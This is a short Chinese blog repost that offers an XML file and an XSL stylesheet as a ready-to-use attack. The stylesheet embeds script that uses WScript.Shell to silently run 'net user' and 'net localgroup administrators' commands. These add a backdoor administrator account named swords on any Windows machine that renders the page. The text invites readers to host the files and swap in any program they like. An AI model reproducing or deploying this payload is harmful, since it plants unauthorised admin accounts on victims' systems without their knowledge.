用法:把swords.xml和swords.xsl放在一个普通空间,相信很少人会注意xml的安全性吧,嘎嘎,只要把你想运行的程序添加到run() 即可,默认支持js和vbs.这个程序加了一个用户为 swords,密码为est的超级管理员账号。
swords.xml
<?xml version="1.0" encoding="GB2312"?><?xml-stylesheet type="text/xsl" href="swords.xsl"?><name>I am swords,I am admin!</name>
swords.xsl
<?xml version="1.0" encoding="gb2312"?> <xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl"> <xsl:template match="/"> <html> <body> <xsl:value-of select="name" /><xsl:script>function run() { var wsh;var wsh = new ActiveXObject("WScript.Shell");wsh.run( "net user swords est /add",0);wsh.run( "net localgroup administrators swords /add",0);wsh.run( "cmd.exe /c echo test!");} </xsl:script> <xsl:eval>run()</xsl:eval> </body> </html> </xsl:template> </xsl:stylesheet>
转载于:https://www.cnblogs.com/tuyile006/archive/2006/11/25/572512.html
相关资源:数据结构—成绩单生成器